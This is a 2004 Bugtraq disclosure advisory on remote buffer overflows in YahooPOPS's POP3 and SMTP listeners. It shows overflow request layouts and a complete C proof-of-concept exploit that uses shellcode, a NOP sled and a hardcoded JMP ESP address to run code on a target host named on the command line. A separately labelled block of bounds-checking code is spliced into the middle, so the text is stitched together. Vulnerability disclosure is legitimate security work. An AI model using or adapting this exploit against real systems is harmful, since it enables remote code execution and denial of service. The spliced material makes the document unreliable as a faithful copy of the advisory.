
List:       bugtraq
Subject:    [Hat-Squad] Remote Buffer overflow Vulnerability in YahooPOPS
From:       Hat-Squad Security Team <bugtraq () hat-squad ! com>
Date:       2004-09-27 8:36:46
Message-ID: 20040927083646.11788.qmail () www ! securityfocus ! com



Hat-Squad Advisory: Remote Buffer overflow Vulnerability in YahooPOPS
September 22, 2004 

Product: YahooPOPS! 
Vendor URL: http://yahoopops.sourceforge.net
Version: YahooPOPS v0.4 up to v0.6
Vulnerability: Remote Buffer overflows 
Release Date: 27 September 2004

Vendor Status: 
Informed on 24 September 2004
Response: no response
Description:

YahooPOPs! is an application that provides POP3 access to Yahoo! Mail. It is available on the Windows, Linux, Solaris and Mac platforms. The application emulates a POP3 and SMTP server, which lets popular email clients such as Outlook, Netscape, Eudora and Mozilla download email from Yahoo! accounts. The latest version of the program is 0.6, released on 23 May 2004; it has since been downloaded by over 120000 users.

Both the POP3 and SMTP services have buffer overflow vulnerabilities. A remote attacker can send a specially crafted request to either service to cause a stack-based buffer overflow, which could allow execution of arbitrary code or simply crash the service on a vulnerable system.
Details: 

YahooPOPS 0.x has local SMTP and POP3 engines to send and receive email. The SMTP service is not enabled by default; users can enable it in the software options.

A POP3 USER request with more than 180 bytes will start to corrupt the heap. 
POP3 request (DoS attack):

Telnet localhost 110
+OK POP3 YahooPOPs! Proxy ready 
[USER][180xA][BBBB]

As a result, EAX and ECX will be overwritten.

SMTP request:
Sending a request of more than 504 bytes will overwrite ESP and cause a stack-based overflow.


Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready 
[504xA] [BBBB]

As a result, the EIP register will be overwritten.
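As an added example (not part of this advisory and not YahooPOPs' own code), the following shows the bounded request handling that would prevent both overflows described above: the request line is length-checked before it is copied anywhere, and the USER argument is copied into a fixed-size buffer only if it fits, otherwise the command is rejected with an error code. The constants MAX_LINE and MAX_USER_ARG, the function names and the status codes are assumptions chosen for this illustration; the 512-octet command-line limit follows RFC 5321 and the 40-character argument limit follows RFC 1939. The test inputs (a USER line padded with 'A' bytes, mirroring the [USER][180xA] request above) are constructed inside the helper.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed limits for this example: RFC 5321 caps an SMTP command line at
 * 512 octets including CRLF; RFC 1939 caps a POP3 argument at 40 characters.
 * The bug class in the advisory is a receive buffer smaller than the input
 * the server accepts, so every buffer below is sized for the limit it enforces. */
#define MAX_LINE     512
#define MAX_USER_ARG 41   /* 40 characters plus the terminating NUL */

enum cmd_status {
    CMD_OK            =  0,
    CMD_LINE_TOO_LONG = -1,
    CMD_ARG_TOO_LONG  = -2,
    CMD_BAD_SYNTAX    = -3
};

/* Parses "USER <name>\r\n" and copies <name> into user_out (capacity user_cap).
 * The unsafe pattern this replaces is strcpy(user, arg) into a stack array. */
int pop3_user(const char *line, size_t line_len, char *user_out, size_t user_cap)
{
    const char *arg;
    size_t arg_len;

    if (line_len > MAX_LINE)                 /* reject before touching any buffer */
        return CMD_LINE_TOO_LONG;
    if (line_len < 5 || strncmp(line, "USER ", 5) != 0)
        return CMD_BAD_SYNTAX;

    arg = line + 5;
    arg_len = line_len - 5;
    while (arg_len > 0 && (arg[arg_len - 1] == '\r' || arg[arg_len - 1] == '\n'))
        arg_len--;                           /* strip the line terminator */
    if (arg_len == 0)
        return CMD_BAD_SYNTAX;
    if (arg_len >= user_cap)                 /* must leave room for the NUL */
        return CMD_ARG_TOO_LONG;

    memcpy(user_out, arg, arg_len);
    user_out[arg_len] = '\0';
    return CMD_OK;
}

/* The SMTP side needs the same gate: a line longer than the buffer the
 * server will read it into is refused instead of copied. */
int smtp_line_ok(size_t line_len)
{
    return line_len <= MAX_LINE ? CMD_OK : CMD_LINE_TOO_LONG;
}

/* Convenience wrapper returning the parsed name from static storage,
 * or NULL when the command was rejected. */
const char *extract_user(const char *line)
{
    static char user[MAX_USER_ARG];
    if (pop3_user(line, strlen(line), user, sizeof user) != CMD_OK)
        return NULL;
    return user;
}

/* Test helper: builds the constructed request "USER " + n x 'A' + "\r\n"
 * and returns pop3_user's verdict on it. */
int user_status_for_arg_len(size_t n)
{
    char user[MAX_USER_ARG];
    size_t len = 5 + n + 2;
    char *line = malloc(len + 1);
    int rc;

    if (line == NULL)
        return CMD_BAD_SYNTAX;
    memcpy(line, "USER ", 5);
    memset(line + 5, 'A', n);
    memcpy(line + 5 + n, "\r\n", 2);
    line[len] = '\0';
    rc = pop3_user(line, len, user, sizeof user);
    free(line);
    return rc;
}

int main(void)
{
    printf("USER alice          -> %s\n", extract_user("USER alice\r\n"));
    printf("USER + 180 x 'A'    -> status %d\n", user_status_for_arg_len(180));
    printf("USER + 600 x 'A'    -> status %d\n", user_status_for_arg_len(600));
    printf("504-byte SMTP line  -> status %d\n", smtp_line_ok(504));
    printf("513-byte SMTP line  -> status %d\n", smtp_line_ok(513));
    return 0;
}
```

A 504-byte SMTP line is accepted here because MAX_LINE is 512 and the receive buffer is sized accordingly; the point is that the accepted length and the buffer size are the same constant, so no input the server agrees to read can outgrow the memory it is read into.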


Proof of concept demo exploit for the YPOPs! SMTP listener:

#include <stdio.h>
#include <stdlib.h>   /* atoi, exit */
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
{
static char overflow[1024];

char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";


/*- harmless code (tnx to snooq) , will open  notepad on the remote machine */
char code[]= "\x33\xc0"	// xor eax, eax	 slight modification to move esp up
 "\xb0\xf0"		// mov al, 0f0h
 "\x2b\xe0"		// sub esp,eax
 "\x83\xE4\xF0"	// and esp, 0FFFFFFF0h
 "\x55" // push ebp
 "\x8b\xec" // mov ebp, esp
 "\x33\xf6" // xor esi, esi
 "\x56" // push esi
 "\x68\x2e\x65\x78\x65" // push 'exe.'
 "\x68\x65\x70\x61\x64" // push 'dape'
 "\x68\x90\x6e\x6f\x74" // push 'ton'
 "\x46" // inc esi
 "\x56" // push esi
 "\x8d\x7d\xf1" // lea edi, [ebp-0xf]
 "\x57" // push edi
 "\xb8\x35\xfd\xe6\x77" // mov eax,XXXX -> WinExec()win2k(SP4)=0x7c4e9c1d
 "\xff\xd0" // call eax
 "\x4e" // dec esi
 "\x56" // push esi
 "\xb8\xfd\x98\xe7\x77" // mov eax,YYYY ->ExitProcess()win2k(SP4)0x7c4ee01a
 "\xff\xd0"; // call eax



   WSADATA wsaData;


   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;   /* SMTP banner buffer; one byte reserved for the terminator */
   int sockfd, bytes;
   int plen,i;
   char *hostname;
   unsigned short port;

  if (argc <= 1)
   {
	  printf("YPOPs! SMTP Overflow\n");
	  printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");
      printf("Usage: %s [hostname] [port]\n", argv[0]);
      printf("default port is 25 \n");
	
      exit(0);
   }

   printf("YPOPs! SMTP Overflow\n");
   printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");

   hostname = argv[1];
   if (argc > 2) port = atoi(argv[2]);
   else port = 25;

   

   if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
   {
      fprintf(stderr, "Error setting up with WinSock v1.1\n");
      exit(-1);
   }


   hp = gethostbyname(hostname);
   if (hp == NULL)
   {
      printf("ERROR: Uknown host %s\n", hostname);
	  printf("%s",hostname);
      exit(-1);
   }

   sockin.sin_family = hp->h_addrtype;
   sockin.sin_port = htons(port);
   sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Socket Error\n");
      exit(-1);
   }

   if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
   {
      printf("ERROR: Connect Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   printf("Connected to [%s] on port [%d], sending overflow....\n",
          hostname, port);

   
   if ((bytes = recv(sockfd, buf, sizeof(buf) - 1, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Recv Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(1);
   }

   /* wait for SMTP service welcome*/
   buf[bytes] = '\0';
   check = strstr(buf, "220");
   if (check == NULL)
   {
      printf("ERROR: NO  response from SMTP service\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }
  
 plen=504-sizeof(code);
   memset(overflow,0,sizeof(overflow));
  
   for (i=0; i<plen;i++){strcat(overflow,"\x90");}  

   strcat(overflow,code);
   strcat(overflow,ret_code);
   strcat(overflow,jump_back);
   strcat(overflow,"\n");
  
   if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
   {
      printf("ERROR: Send Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   printf("Exploit Sent.\n");
  
   closesocket(sockfd);
   WSACleanup();
   return 0;
}

--------------------------------------------------------------------------

Vendor response: no response

Credits:

This vulnerability has been discovered by Nima Majidi (nima_majidi@hat-squad.com)

The original advisory can be found at:

http://www.hat-squad.com/en/000075.html

